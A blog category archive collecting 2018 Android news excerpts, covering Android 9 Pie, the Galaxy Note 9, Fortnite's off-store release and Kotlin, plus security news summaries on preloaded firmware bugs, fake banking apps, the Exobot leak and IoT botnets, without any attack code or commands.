Category Archives: Android

Google Play Shows Warning To Anyone Searching For Fortnite APKs

Mark Wilson quotes a report from BetaNews: The arrival of Fortnite on Android has not only been eagerly awaited, but also steeped in controversy. In addition to making the game a Samsung exclusive (for a few days, anyway), Epic Games decided to bypass Google Play and host APK downloads on its own servers. But this isn't going to stop people looking for Fortnite in the Play Store. Google is well aware of this, and that there is the potential for fake, scam apps to appear, tricking users into downloading something malicious. As such, the company is taking action, and is showing a warning to anyone who searches for Fortnite in Google Play. Conduct a search for Fortnite in Google's app store and you'll be greeted by a message that reads "Fortnite Battle Royale by Epic Games, Inc is not available on Google Play." Searchers are also advised that Fortnite rival PlayerUnknown's Battlegrounds (PUBG) is available to download.

Read more of this story at Slashdot.

Millions of Android Devices Are Vulnerable Right Out of the Box

Security meltdowns on your smartphone are often self-inflicted: You clicked the wrong link, or installed the wrong app. But for millions of Android devices, the vulnerabilities have been baked in ahead of time, deep in the firmware, just waiting to be exploited. Who put them there? Some combination of the manufacturer that made it, and the carrier that sold it to you. From a report: That's the key finding of new analysis from mobile security firm Kryptowire, which details troubling bugs preloaded into 10 devices sold across the major US carriers. Kryptowire CEO Angelos Stavrou and director of research Ryan Johnson will present their research, funded by the Department of Homeland Security, at the Black Hat security conference Friday. The potential outcomes of the vulnerabilities range in severity, from being able to lock someone out of their device to gaining surreptitious access to its microphone and other functions. They all share one common trait, though: They didn't have to be there. [...] "The problem is not going to go away, because a lot of the people in the supply chain want to be able to add their own applications, customize, add their own code. That increases the attack surface, and increases the probability of software error," Stavrou says. "They're exposing the end user to exploits that the end user is not able to respond to." Security researchers found 38 different vulnerabilities that can allow for spying and factory resets loaded onto 25 Android phones. That includes devices from Asus, ZTE, LG and the Essential Phone, which are distributed by carriers like Verizon or AT&T.

Read more of this story at Slashdot.

Samsung Announces $1,000 Galaxy Note 9 Smartphone With Last-Gen Android Software Out-of-the-Box

The Galaxy Note 9 touts a slightly larger 6.4-inch end-to-end screen, a 4,000mAh battery that promises "all-day" use, and a minimum 128GB of storage -- there's also a 512GB version that, with 512GB microSD cards, can give you a full terabyte of space. It runs Android 8.1 Oreo -- not Android Pie, which Google and Essential rolled out to some of their devices earlier this month. Engadget: Samsung is also bringing over welcome improvements from the Galaxy S9 family, including stereo speakers and the variable aperture f/1.5-2.4 primary camera (there's a second camera on the back, of course). This year, though, the most conspicuous change revolves around the S Pen. This is Samsung's first S Pen to incorporate Bluetooth, and that lets you do a whole lot more than doodle on the screen. You can use it as a remote control for selfies and presentations, and Samsung is providing a toolkit to let app developers use the pen for their own purposes. And no, you don't need to load it with batteries or plug it into a charger -- it'll top up just by staying in your phone. The base model of the Note 9, featuring 128GB of storage and 6GB of RAM, is priced at $999. The other variant will set you back by $1,250. Preorders begin on August 10th, and the phone will be available on August 24th at all major carriers or direct (and unlocked) from Samsung. CNET writes about the camera sensors on the new handset: The Galaxy Note 9 keeps the same hardware setup as the Galaxy S9 Plus. That is, dual 12-megapixel cameras on the back, one of them that automatically changes aperture when it detects the need for a low-light shot. (Samsung calls this dual aperture, and it's also on both S9 phones.) There's also an 8-megapixel front-facing camera for your selfies. What's different is AI software that analyzes the scene and quickly detects if you're shooting a flower, food, a dog, a person. There are 20 options the Note 9's been trained on, including snowflakes, cityscapes, fire, you get it. Then, the camera optimizes white balance, saturation and contrast to make photos pop.

Read more of this story at Slashdot.

Samsung Galaxy S7 Vulnerable To Hacking Due To Meltdown Security Flaw

Samsung Galaxy S7 is, perhaps, one of the most talked about phones by Samsung. Yet, they turned out to be

Samsung Galaxy S7 Vulnerable To Hacking Due To Meltdown Security Flaw on Latest Hacking News.

Smashing Security #090: Fortnite for Android, and the FCC’s DDoS BS

Smashing Security #090: Fortnite for Android, and the FCC's DDoS BS

Fortnite players are told they’ll have to disable a security setting on Android, the FCC finally admits that it wasn’t hit by a DDoS attack, and Verizon’s VPN smallprint raises privacy concerns.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault, joined this week by David Bisson.

Google announces Android Pie SDK that is more “Kotlin-friendly”

Google’s Android Pie SDK is now more Kotlin-friendly

At Google’s I/O 2017 Developers Conference last year, the search giant had announced Kotlin would be an officially supported language in Android and it will join the list of existing programming languages used for Android app development, such as Java and C++. It is also predicted that Kotlin will be surpassing Java as the primary programming language used for Android apps by December 2018.

Moving further in this direction, Google who recently announced Android’s new operating system, Android 9 Pie has also released an SDK that is more Kotlin-friendly.

For those unaware, developed by JetBrains for JVM (Java Virtual Machine), Android, JS browser and native applications, Kotlin can be compiled to Java source code and can be used alongside Java to build apps. Like Java, Kotlin as a language is object-oriented and statically typed and fully interoperable with Java code. It is designed to solve the similar problem that Java does. It also adds a lot of nice-to-have features that Java itself doesn’t currently support, a much cleaner syntax, improved code readability, ideas from functional programming, and other improvements over Java. Also, Kotlin’s interoperability with Java makes it possible to call Kotlin code from Java or Java code from Kotlin.

Google in its new blog post announced that the newly released Android SDK contains nullability annotations for some of the most frequently used APIs, which will preserve the null-safety guarantee when your Kotlin code is calling into any annotated APIs in the SDK.

“Normally, nullability contract violations in Kotlin result in compilation errors. But to ensure the newly annotated APIs are compatible with your existing code, we are using an internal mechanism provided by the Kotlin compiler team to mark the APIs as recently annotated. Recently annotated APIs will result only in warnings instead of errors from the Kotlin compiler. You will need to use Kotlin 1.2.60 or later.

“Our plan is to have newly added nullability annotations produce warnings only, and increase the severity level to errors starting in the following year’s Android SDK. The goal is to provide you with sufficient time to update your code,” Google added.

If want to know how you can use the “Kotlin-friendly” SDK, simply follow the steps below.

1. Go to Tools > SDK Manager in Android Studio.

2. Choose Android SDon the left menu, and ensure that the SDK Platforms tab is open.

3. Check Android 8.+ (P) and click OK. This will install the Android SDK Platform 28 revision 6 if it is not already installed.

4. Then, set your project’s compile SDK version to API 28 to start using the new Android Pie SDK with nullability annotations.

Also, note that if your Kotlin plugin in Android Studio is not up-to-date, you will have to update it. Ensure that your Kotlin plugin version is 1.2.60 or later by going to Tools > Kotlin > Configure Kotlin Plugin Updates.

Once it’s set up, your builds will start showing warnings if you have any code that violates nullability contracts in the Android SDK. You will also start seeing warnings in Android Studio’s code editor if you call an Android API with the incorrect nullability.

For more information on the “Kotlin-friendly” SDK, you can click here.

Source: Android Developers Blog

The post Google announces Android Pie SDK that is more “Kotlin-friendly” appeared first on TechWorm.

Android 9.0 Pie is here: How to get it and what’s new

It’s official: Android P is Android 9 Pie and it is rolling out on Google Pixel devices

The wait is finally over! Google has officially rolled out the stable version of Android 9.0 for smartphones. The next version of Android operating system is called Android 9 Pie and is now available on Google’s own Pixel Android phones via over-the-air (OTA) updates. These are Pixel, Pixel XL, Pixel 2, and Pixel 2 XL smartphones.

“The latest release of Android is here! And it comes with a heaping helping of artificial intelligence baked in to make your phone smarter, simpler and more tailored to you. Today we’re officially introducing Android 9 Pie,” Sameer Samat, VP of product management, Android & Google Play wrote in the official blog that announced availability of the Android 9 P .

Besides the Pixel phones, the Android 9 Pie will also be soon available on phones that were part of the Android P beta program. Google said “Devices that participated in the Beta program from Sony Mobile, Xiaomi, HMD Global, Oppo, Vivo, OnePlus, and Essential, as well as all qualifying Android One devices, will receive this update by the end of this fall! We are also working with many other partners to launch or upgrade devices to Android 9 this year.”

However, Essential phone has already started receiving Android Pie.”We’re proud to bring Android 9 Pie to Essential Phone the same day it’s released! Check your phone now for the update,” Essential tweeted out from its official twitter account.

Coming to Android 9 Pie, the new OS “harnesses the power of artificial intelligence to give you more from your phone. Now it’s smarter, faster and adapts as you use it,” says Google.

Features like Adaptive Battery and Adaptive Brightness uses machine learning to prioritize system resources for the apps, which means these will give your phone greater longevity and your phone’s screen will also adjust better to surrounding conditions. Further, new features like App Actions predicts what you’re about to do, so that you get to your next task more quickly.

Also, Google has replaced the traditional three-button navigation bar with a new gesture-based system in Android 9 Pie. It is a new gesture-based system that’s similar to what Apple uses on the iPhone X. You can simply switch between apps and get to what you need more naturally by using gestures.

Another feature ‘Slices’ brings relevant parts of your favorite apps to the surface. For instance, you can see real-time pricing and driver ETAs from services like Uber or Lyft when you are searching for a ride. However, Slices will not be available until the Fall for non-beta users.

However, another notable feature of Google’s IO presentation about Android P was a broad feature called “Digital Wellbeing.” This feature includes ‘Do Not Disturb’ mode that blocks both sound and notifications, while ‘Wind Down’ mode will set a daily schedule to get your phone ready for bed and even turn fade your screen to gray to avoid any disturbance. Also, included in Digital Wellbeing is ‘App dashboard’ that shows users how much time they spend on apps through visual graphs and pie charts, whereas ‘App Timers’ will allow users to set time limits on apps and when that time is up, the app is paused for the rest of the day.

However, these Digital Wellbeing features will be offered as a beta for Pixel users. These features will roll out only this fall for non-beta users. The signup for the beta is here.

“We’ve built Android 9 to learn from you — and work better for you — the more you use it. From predicting your next task so you can jump right into the action you want to take, to prioritizing battery power for the apps you use most, to helping you disconnect from your phone at the end of the day, Android 9 adapts to your life and the ways you like to use your phone,” said Samat.

Those who own the Google Pixel, Pixel XL, Pixel 2, Pixel 2 XL and Essential Phone can upgrade their devices to Android P by going to Settings > System > System Update and tapping on ‘download and install’

Also read:  Android phones cannot have more than 2 notches on display, says Google

The post Android 9.0 Pie is here: How to get it and what’s new appeared first on TechWorm.

Android Pie: Security and privacy changes

It is official: “Android P” is Android Pie, and it comes with a variety of new capabilities and security and privacy changes. The newest version (9.0) of the popular mobile OS introduces a new system navigation featuring a single home button, smart text selection, digital wellbeing controls, adaptive battery, a neural networks API, smart reply, and more. Security improvements Android 9 has the following security improvements: Built-in support for DNS over TLS, automatically upgrading DNS … More

The post Android Pie: Security and privacy changes appeared first on Help Net Security.

Google Android P is officially called Android 9 Pie

If you have bet on Peppermint, Pancake or Pastry for "P" in the next version of Google's mobile operating system, sorry guys you lose because Android P stands for Android Pie. Yes, the next version of sugary snack-themed Android and the successor to Android Oreo will now be known as Android 9.0 Pie, and it has officially arrived, Google revealed on Monday. Android 9 Pie — 5 Best New

Google Begins Rolling Out Android Pie To Select Handsets

Google on Monday announced that the 'P' in Android P stands for Android Pie, succeeding Android Oreo. It also pushed the source code of the latest version to the Android Android Open Source Project (AOSP). The latest version of Google's mobile operating system, Android 9.0 Pie, is also starting to roll out today as an over-the-air update to Pixel phones, the company said. From a report: If you don't have a Pixel phone, you won't be getting Android Pie for a while (if at all). During the beta testing phase, Android P was made available on the Sony Xperia XZ2, Xiaomi Mi Mix 2S, Nokia 7 Plus, Oppo R15 Pro, Vivo X21, OnePlus 6, and Essential PH-1. [...] Google wants you to know that Android Pie includes a "heaping helping of artificial intelligence baked in to make your phone smarter, simpler, and more tailored to you." Android Pie offers of a slew of new features including built-in support for display cutouts (read: notches), a tweaked Quick Settings panel, a notification drawer with rounded corners, messages in notifications when replying inline, smart replies in notifications, a consistent UI for fingerprint authentication, privacy enhancements to limit what apps can do in the background, Adaptive Battery and Adaptive Brightness features (courtesy of Google DeepMind), App Actions for predicting what the user will do next, App Slices for surfacing an app's user interface inside the Google app's search results and inside Google Assistant, a BiometricPrompt API for a system-managed dialog to prompt the user for any supported type of biometric authentication, and multi-camera APIs that let you access streams simultaneously from two or more physical cameras.

Read more of this story at Slashdot.

Why iPhone and Android Phone Prices Will Get Even Higher

Critics scoffed Apple when the company priced the iPhone X at $1,000. But the way the market has responded to it, there is a good chance that the upcoming flagship smartphones from Apple and those of its rivals -- Samsung, Google, and HTC -- will be pricier. From a column: The critics were wrong. Apple CEO Tim Cook said in July that the iPhone X had outsold every other Apple device in each week since it went on sale Nov. 3, 2017. With strong iPhone X sales, Apple proved that mainstream buyers are willing to pay almost as much, if not more, for their cell phones as they would for a powerful laptop. And with rumors of an even pricier 2018 iPhone X Plus-style phone coming down the pike this September, Apple's moves to usher in the era of the $1,000 phone may just be getting underway. Apple isn't alone in boosting mobile phone prices ever higher. Creeping prices on high-end handsets from Samsung, Huawei and even "value" darling OnePlus signal that price hikes are here to stay. In just two years, the cost of Samsung's Galaxy phone for US buyers has spiked 15.1 percent from the Galaxy S7 in 2016 to this year's Galaxy S9, while the Huawei P series has climbed 33 percent since 2016 -- and that doesn't even account for the existence of a "Pro" model. [...] The trend of increasingly costly handsets in the top tier underscores the cell phone's importance as an everything-device for communication, work, photography and entertainment. And as processing power, camera technology, battery life and internet data speeds improve generation after generation, the value people attach to a phone is sure to swell.

Read more of this story at Slashdot.

iKeyMonitor: A parental control app ensuring safety of your child

By Carolina

Parents are raising a completely new breed of kids. Nowadays, toddlers use mobile devices and teens use text messages to communicate. Many schools have also integrated computers and tablets in their curriculum. To ensure children use the Internet safely, parents need a parental control app such as iKeyMonitor. Parents do allow their children to use […]

This is a post from Read the original post: iKeyMonitor: A parental control app ensuring safety of your child

Android phones cannot have more than 2 notches on display, says Google

Google directs Android smartphone manufacturers to allow only two display cutouts

In one of the latest posts on the Android Developer Blog, Google has laid down ground rules for Android phone manufactures that allows them to have one or even two display cutouts in devices, but not more than that.

Google has explained how developers should make changes to their app’s code to include only up to two notches and displays with 18:9 or more aspect ratios.

“You won’t see multiple cutouts on a single edge, or more than two cutouts on a device,” said Meghan Potoski, Android UI product manager in the blog post.

For those unaware, the display notch trend was kickstarted by the Essential with its PH-1 Android smartphone, and the trend was carried forward by Apple with the iPhone X. Due the success of iPhone X, phone manufactures are making it the norm to include it on 2018 flagship phones in the process. Until now, there are 16 Android devices from 11 OEMs that feature display cutouts.

Therefore, in order to ensure consistency and app compatibility, Google is working with their device manufacturer partners to mandate a few requirements regarding notches.

According to Google, the first requirement is to ensure that cutouts do not negatively affect apps and user experience. For instance, when the device is in portrait mode with no special flags set, the height of the status bar must extend to at least the height of the cutout so that the content can be displayed in the window below. Similarly, if the device is in full screen or landscape orientation, then the entire cutout area must be letterboxed so that none of the content is displayed in the cutout area.

The second requirement mentioned in the blog post is that devices can have only one cutout on each short edge of the device, which means that a single edge cannot have multiple cutouts, or more than two cutouts or notches in total. Also, the cutout cannot be placed on the left or right long edge of the device.

The blog post also explains how developers can make their apps compatible with devices that support display notches. Google has laid down these mandates so that developers can make apps that offers a consistently great experience across devices with one or two display cutouts, as well as devices with 18:9 and larger aspect ratios.

Earlier this year, Google had announced that the forthcoming Android P, its ninth major version of the Android operating system, will have display cutout support that will enable full-screen apps to house notches. With the final version of Android P expected to be released soon, one could see more devices embracing the notch in the coming months.

The post Android phones cannot have more than 2 notches on display, says Google appeared first on TechWorm.

Citing ‘Economic Efficiency,’ Epic Says Fortnite’s Upcoming Android App Won’t Hit Google Play Store

Fortnite developer Epic Games will not be distributing its massively popular game on Android because the Play Store takes a 30 percent cut of the revenue. Instead, the company plans to distribute the software to players via the official Fornite website, "where Android users can download a Fortnite Installer program to install the game on compatible devices," reports The Verge. From the report: For Fortnite on iOS, Epic decided to distribute the game on the App Store, most likely because it had no other method of getting iPhone users to easily download the software. (Apple, unlike Google, does not allow iOS users to download apps that are not first approved by its internal review processes and distributed through its proprietary marketplace.) With Google and its more open platform, Epic can get away with distributing the app itself. CEO Tim Sweeney says the primary motivation here is twofold. Epic wants to maintain its direct relationship with consumers. (The company currently distributes Fortnite on PC through its own Epic Games Launcher, instead of using Valve's popular Steam platform.) The second reason is financial: Epic does not want to pay Google's 30 percent cut, especially considering the entire game is funded through in-app purchases. "The 30 percent store tax is a high cost in a world where game developers' 70 percent must cover all the cost of developing, operating, and supporting their games," Sweeney says. "There's a rationale for this on console where there's enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers." But on mobile platforms that are open, like Android, "30 percent is disproportionate to the cost of the services these stores perform, such as payment processing, download bandwidth, and customer service," he says. Sweeney adds that Epic is "intimately familiar with these costs" from its direct distribution of Fortnite on Mac and PC. There's no word as to when the Android version of Fortnite will be available, but rumors suggest it will be tied to the upcoming Samsung Galaxy Note 9 launch on August 9th.

Read more of this story at Slashdot.

Motorola Launches Verizon-Exclusive Moto Z3 Smartphone, 5G Moto Mod

Motorola unveiled their new flagship Moto Z3 smartphone today that's upgradeable to 5G. Like other Moto Z phones, the Z3 includes support for Moto Mods, including a new 5G Moto Mod that will let you use Verizon's mobile 5G network when it launches in 2019. The new Mod contains a Snapdragon X50 modem and 2,000mAh battery to help you stay connected to the 5G network. PhoneDog reports: The Moto Z3 is a Motorola phone that's exclusive to Verizon in the U.S. Specs for this Android 8.1-powered smartphone include a 6.01-inch 2160x1080 Super AMOLED screen and 8MP wide angle front-facing camera with f/2.0 aperture. Around back there's a dual rear camera setup with two 12MP cameras, one RGB and one monochrome, along with laser autofocus and portrait mode support. Inside the Moto Z3 lives an octa-core Snapdragon 835 processor along with 4GB of RAM, 64GB of built-in storage, and a microSD card slot. There's a 3000mAh battery and a USB-C port for recharging that battery, as well as support for Motorola's TurboPower solution to recharge in a hurry. Unfortunately, there's no 3.5mm headphone jack to be found here. All of those features are crammed into a body with a water repellent coating. Rounding things out is a side-mounted fingerprint reader and support for face unlock.

Read more of this story at Slashdot.

Google-backed Kotlin Gains Adoption in Open Source Android Apps; Scientists Say It Has Improved Code Quality

Kotlin, which Google blessed last year as an alternative to Java for programming Android apps, has already made its way into almost 12 per cent of open source Android apps, and in so doing has elevated their code quality. From a report: So we're told by computer scientists Bruno Gois Mateus and Matias Martinez, affiliated with University of Valenciennes in France, who observed that Google at the end of 2017 said Kotlin had infiltrated more than 17 per cent of Android apps developed with its IDE, Android Studio 3.0. Kotlin is an open source statically typed programing language that targets the JVM, Android, JavaScript (transpiling to ES5.1) and native platforms (via LLVM). JetBrains, the company that created it, contends Kotlin is more concise and more type-safe than Java. It estimates that apps written in Kotlin require about 40 per cent less code than they would with Java. With fewer lines of code, in theory, one can expect fewer bugs. In a paper distributed through pre-print service ArXiv, "An Empirical Study on Quality of Android Applications written in Kotlin language," Mateus and Martinez describe how they gathered 925 apps from the open source F-Droid repository, measured the amount of Kotlin code in each, and analyzed the code for "smells" as an indicator of code quality.

Read more of this story at Slashdot.

Mac Virus: Android and OneDrive, and iOS-targeting phish

Tomáš Foltýn for ESET: OneDrive app for Android updated with fingerprint authentication –
“With this update, Microsoft is bringing a feature for Android users that has been available on iOS devices for quite a while now” Actually quotes an old blog post of mine: Smartphone Authentication: the Passing of the Passcode? Good to know someone occasionally reads my blogs. 😉

Sean Gallagher for ArsTechnica: Click on this iOS phishing scam and you’ll be connected to “Apple Care” – “This phishing attack also comes with a twist—it pops up a system dialog box to start a phone call. The intricacy of the phish and the formatting of the webpage could convince some users that their phone has been “locked for illegal activity” by Apple, luring users into soon clicking to complete the call.” Commentary from Sophos: Porn-warning security scam hooks you up to “Apple Care”

David Harley


Mac Virus

Blog | Avast EN: The Best and Safest Phones for Kids of All Ages | Avast

Some kids take their first steps into the digital world at the tender age of one, when they discover Elmo apps on the family iPad. By the time we give them their first cell phones, they’re already familiar with the web, basic internet etiquette, and the way mobile devices work — let’s face it, they’re a savvy generation.

Blog | Avast EN

Samsung’s Tab S4 Is Both An Android Tablet and a Desktop Computer

Today, Samsung unveiled the successor to the Galaxy Tab S3 from last year. The aptly named Galaxy Tab S4 features a 10.5-inch Super AMOLED display with a 2560 x 1600 resolution, Qualcomm Snapdragon 835 processor with 4GB RAM, 64GB internal storage (expandable via microSD card) and 13-megapixel f1.9 rear-facing camera. Unlike the Tab S3, it includes Samsung Dex software that lets users connect a Samsung mobile device to a monitor and then use the device as a pseudo-desktop. Ars Technica reports: The first Dex dock came out over a year ago and was designed to be used with Samsung smartphones. Users could plug their device into the dock, connect it to a monitor, pair a keyboard and a mouse, and use the setup as they would a full desktop PC. The system ran a version of Android that Samsung modified to better suit a desktop UI, which included a lock screen and a task bar area with app icons. Dex on the Galaxy Tab S4 works just like this, with a couple of extra features that leverage the power of a tablet. When connected to a monitor, both the big screen and the tablet's screen can be used simultaneously. In a short demo, Samsung showed how the device supports up to 20 open windows at once and how features like split screen and drag-and-drop can be used just as they would on a desktop PC. Users can launch Dex when not connected to a monitor as well, and that produces the same modified Android UI on the tablet's 10.5-inch, 2560 x 1600 Super AMOLED display. When connected to a monitor, both the big screen and the tablet's screen can be used simultaneously. In a short demo, Samsung showed how the device supports up to 20 open windows at once and how features like split screen and drag-and-drop can be used just as they would on a desktop PC. Users can launch Dex when not connected to a monitor as well, and that produces the same modified Android UI on the tablet's 10.5-inch, 2560x1600 Super AMOLED display. The tablet carries a $649 price, but includes all the specs mentioned above, as well as support for signature Samsung features like Air Command, translate, and off-screen memos, and a redesigned S Pen.

Read more of this story at Slashdot.

Fake Android Banking Apps Leak Credit Card Details Online

Three fake Android banking apps phished for users’ credit card details and then leaked them online by transferring them to an exposed server.

On July 26, 2018, Slovakian security firm ESET reported that it notified Google about the three fake banking apps that were uploaded to the Google Play Store in June and July 2018. Each of the impostor programs promised to increase users’ credit card limits at one of three Indian banks and presented users with a form to supposedly collect their credit card information.

Upon completing the forms, the apps directed users to a final screen indicating that a “customer service executive” would be in touch soon. Instead, the applications sent users’ information in plaintext to a server where anyone with a link — not just the attackers — could access the saved data.

Fake Android Banking Apps Exploit Common Mobile Security Weaknesses

This campaign highlights attackers’ ongoing interest in mobile banking, which has given rise to a host of new security threats. First, fraudsters are now targeting users with fake mobile banking apps — and users often can’t distinguish between real and potentially malicious programs. According to Avast, 36 percent of users have mistaken fraudulent banking applications as legitimate.

At the same time, banks’ legitimate mobile applications often suffer from security weaknesses themselves. For instance, researchers at the University of Birmingham in the U.K. discovered in December 2017 that even some “high-security” banking, stock trading, cryptocurrency and virtual private network (VPN) applications were susceptible to man-in-the-middle (MitM) attacks due to failure to verify the hostname.

How Can Organizations Stave Off Mobile Banking Threats?

Security professionals should adopt a multipronged approach to defend their organizations against the threat of fake mobile banking apps. IBM experts recommend investing in mobile threat prevention (MTP) solutions, as well as a mobile device management (MDM) platform that allows access to only certain approved applications.

Security leaders can also protect Android devices from fraudulent apps by implementing unified endpoint management (UEM) and over-the-air (OTA) support.

Sources: WeLiveSecurity, Avast, University of Birmingham

The post Fake Android Banking Apps Leak Credit Card Details Online appeared first on Security Intelligence.

Uknown Actor Leaks Android Malware Exobot Source Code

An unknown actor leaked the source code for the Android malware Exobot online, leading to fears of new attack campaigns.

In June 2018, the unknown individual sent a copy of Exobot’s source code to Bleeping Computer, which subsequently shared it with security companies ESET and ThreatFabric. The companies confirmed that the code was for version 2.5 of Exobot, an Android banking Trojan that is based on the Marcher Android malware, according to IBM X-Force researchers.

The source code for Exobot first appeared online in May 2018 after someone who purchased it from the author decided to share it with the malware community.

Why the Source Code Leak Could Foreshadow a Massive Attack

Bleeping Computer researchers observed Exobot’s source code being distributed on “quite a few” underground web marketplaces after receiving its copy. This fact is concerning because previous malware source code leaks have led to surges of new attack campaigns.

For instance, Level 3 Threat Research Labs identified 213,000 Mirai-enslaved bots via communication with the command-and-control server before the release of the malware’s source code. After this event, the team discovered that the number of Mirai bots more than doubled, increasing to 493,000.

This incident occurred just before Mirai staged its infamous distributed denial-of-service (DDoS) attack against Dyn’s managed Domain Name System (DNS) infrastructure in late 2016.

How to Protect Mobile Devices From Android Malware

To protect their organizations against the repercussions from malware source code leaks, IBM experts recommend adopting a broad approach to mobile threat prevention. This strategy requires investing in a unified endpoint management (UEM) solution to scan devices for potential threats and setting up network protocols to help remediate a malware infection.

These features should also include real-time compliance rules and alerts to help automate the process of malware remediation and removal on mobile devices.

Sources: Bleeping Computer, NetFormation

The post Uknown Actor Leaks Android Malware Exobot Source Code appeared first on Security Intelligence.

Android and Apple users affected by a Bluetooth vulnerability

Few days ago The United States Computer Emergency Readiness Team (US-CERT) issued a statement informing the masses about a Bluetooth vulnerability. The fault has been seen on equipment using Qualcomm and Intel chipsets, and Broadcom devices, meaning that almost every Android and Apple user in the world could have become a victim of cybercrime. The vulnerability affects Bluetooth firmware and operating system software drivers, and it allows remote attackers to exploit it to obtain sensitive information.

Attackers within Bluetooth range of two connected devices have been able to utilize a man-in-the-middle network position allowing them to log all information exchanged between the connected devices. The vulnerability lets hackers decrypt, monitor, and even interfere with the traffic sent between the two devices. Millions of devices have been susceptible to being penetrated. A missing validation in the encryption method used in Bluetooth is named as the main reason for the vulnerability – hackers have been able to obtain the keys required to unmask information that is supposed to be encrypted.

Luckily, obtaining the keys is not possible 100% of the time, and even if the OS of one of the connected smart devices is fully up-to-date, hackers are not able to interfere with the connection. In a statement, Bluetooth SIG highlighted that for an attack to be effective, the hacker would not only need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure, but the hacker would also need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. Not a relatively easy task!

All affected vendors have issued patches to address the vulnerability. If you’ve been delaying the software update on your phone or a tablet, now is the perfect time to charge up your smart devices and leave them to perform the updates.

We remind you that Bluetooth exploits are not something unseen and such exploits could be used against you. The best way to avoid becoming a victim of cybercrime is to have quality antivirus software installed on all your smart devices, and to make sure all your devices are running the latest versions of their operations systems. Lastly, turn off your Bluetooth when you are not using it – you will decrease the chances of getting hacked, and you will increase your device battery life.

The post Android and Apple users affected by a Bluetooth vulnerability appeared first on Panda Security Mediacenter.

Sony’s Mobile Business Is Shrinking Out of Existence

The latest earnings report from Sony indicates the company's already tiny smartphone business has shrunk by almost half. "In the quarter ending in July 2018, Sony managed to sell only 2 million mobile devices, down 1.4 million from the same period in the proceeding year," reports The Verge. From the report: In its 2017 accounting year, Sony sold 13.5 million phones, and back in April its modest estimate for 2018 was 10 million, but now that's been revised down to 9 million. Anticipating it will make only $5.49 billion of mobile sales for the entire fiscal 2018, Sony is now in a close contest with HTC for the title of being the least relevant global Android device vendor. At least BlackBerry has its promise of uniquely secure phones and keyboards with actual, physical buttons on them. Sony's signature mobile feature in recent times has been an insistence on shipping massive bezels for way too long. It's important to note that while Sony's mobile business is hurting, Sony as a whole is in good financial health.

Read more of this story at Slashdot.

Google Bans Android Phones From Having Three or More Notches

Google is building official notch support into Android P, but it's laying out some ground rules first: two notches is the limit. From a report: In a blog post for developers yesterday, Android UI product manager Megan Potoski wrote that Google is working with device partners "to mandate a few requirements" for app compatibility purposes. Among those are limits on notches. The mandate says that Android P phones can't have "more than two cutouts on a device." Only one notch is allowed per side, and notches are only allowed on the top and bottom edges -- not the left and right.

Read more of this story at Slashdot.

WhatsApp finally rolls out group video and voice calls

WhatsApp launches encrypted group video and calling for everyone

Back in May, Facebook at its F8 developer conference had announced that it would be adding group calling support for video and voice on WhatsApp later this year.

Starting yesterday, Facebook-owned WhatsApp has officially rolled out the group video & audio calling feature and made it live for users across the world on iOS and Android. This feature allows you to make a group call with up to four participants at the same time. In other words, only four people can be on the group video call simultaneously.

“You can make a group call with up to four people total – anytime and anywhere. Just start a one-on-one voice or video call and tap the new “add participant” button in the top right corner to add more contacts to the call,” WhatsApp said in a statement.

Currently, users make over 2 billion minutes of video and audio calls through WhatsApp every day.

“Group calls are always end-to-end encrypted, and we’ve designed calling to work reliably around the world in different network conditions,” WhatsApp added.

To make use of the feature, users will have to download the latest version of WhatsApp app from the Google Play Store or the Apple App Store.

You can follow the below steps if you want to make a video call.

Step 1: First, make a video or an audio call to a single participant, and then click on ‘Add Participant’ option at the top right corner of the screen.

Step 2: This will show up your contact list and then you can choose your participants who you want to add on the group call.

Step 3: Once the participant is added to the group video call, all the participants, including the new and those who are already on call will be notified by WhatsApp.

The app allows to add only one person at a time. Once all the contacts are added, the screen is split into four on everybody’s device, where everyone can see each other. Note that only the first caller or the host, who started a conversation can add people to the video calls.

Currently, Facebook Messenger supports group video calls of up to 50, while Snapchat supports 16 participants. On the other hand, Apple’s FaceTime will allow support up to 32 people at a time when iOS 12 is launched later this year.

Source: WhatsApp

The post WhatsApp finally rolls out group video and voice calls appeared first on TechWorm.

YouTube is rolling out the ‘dark mode’ theme for Android devices

Android users can now use YouTube’s ‘dark mode’ theme on their devices

We had reported last year that Google-owned YouTube, the most popular video streaming website, is testing a new ‘dark mode’ feature that is expected to cause less strain to the user’s eyes while watching YouTube videos at night time or dimly-lit environments. While Google brought the dark theme for desktop users late last year and later on for iOS users earlier this year, Android users still had to wait to receive this update.

Looks like the wait is finally over for at least some Android users, who reported that the dark theme was mysteriously applied when they opened the official YouTube app on Android. The app also served a pop-up at the bottom of the screen informing that this feature is available now. The dark mode comes with a toggle that allows the user to switch off the mode and revert to the light theme, if they wish to.

Although Google has not officially announced the feature, this mode is now available for Android. The dark theme basically reverses the color of the YouTube app UI (user interface) by replacing the white background with black. Apparently, the color isn’t really black but it is more like a dark grey.

It appears that the roll out of the dark mode theme on Android devices is happening in phases and the remaining Android users should see the change on their devices in the coming days or weeks.

Check out how you can enable YouTube dark mode on your Android device:

Step 1: First, launch the YouTube application.

Step 2: Then, tap on your profile icon that appears on the right top corner.

Step 3: Go to Settings > General.

Step 4: Tap on the toggle for “Dark theme” to enable it.

Step 5: Tap on the back button, the theme is automatically saved.

The post YouTube is rolling out the ‘dark mode’ theme for Android devices appeared first on TechWorm.

Threat Actors Breach Consumer Devices to Build IoT Botnets

Security researchers have identified two new threats — Hide ‘N Seek (HNS) and Android Debug Bridge miner (ADB) — which are designed to compromise consumer devices to create Internet of Things (IoT) botnets.

When Fortinet initially tracked HNS in early 2018, the malware was using complex, peer-to-peer communication to compromise routers, IP cameras and DVRs. Over the past several months, the creators added new capabilities. Now, HNS “targets cross-platform database solutions and smart home devices,” according to a July 2018 Fortinet threat report.

Trend Micro discovered a new exploit in early July that uses the Android Debug Bridge (ADB) command line utility, which automatically listens on port 5555, to create a mining botnet. While the threat is currently limited in scope because ADB is turned off by default, Shodan, a search engine for IoT devices, turned up 48,000 exploitable devices.

Mirai-Based Attacks Persist Despite Rising Awareness of IoT Risks

Fortinet noted that HNS uses open source Mirai code to quickly adapt, leveraging a combination of copied code and creative inspiration to add features like code persistence after a reboot. The latest version of HNS also uses nine separate exploits to infect IoT devices.

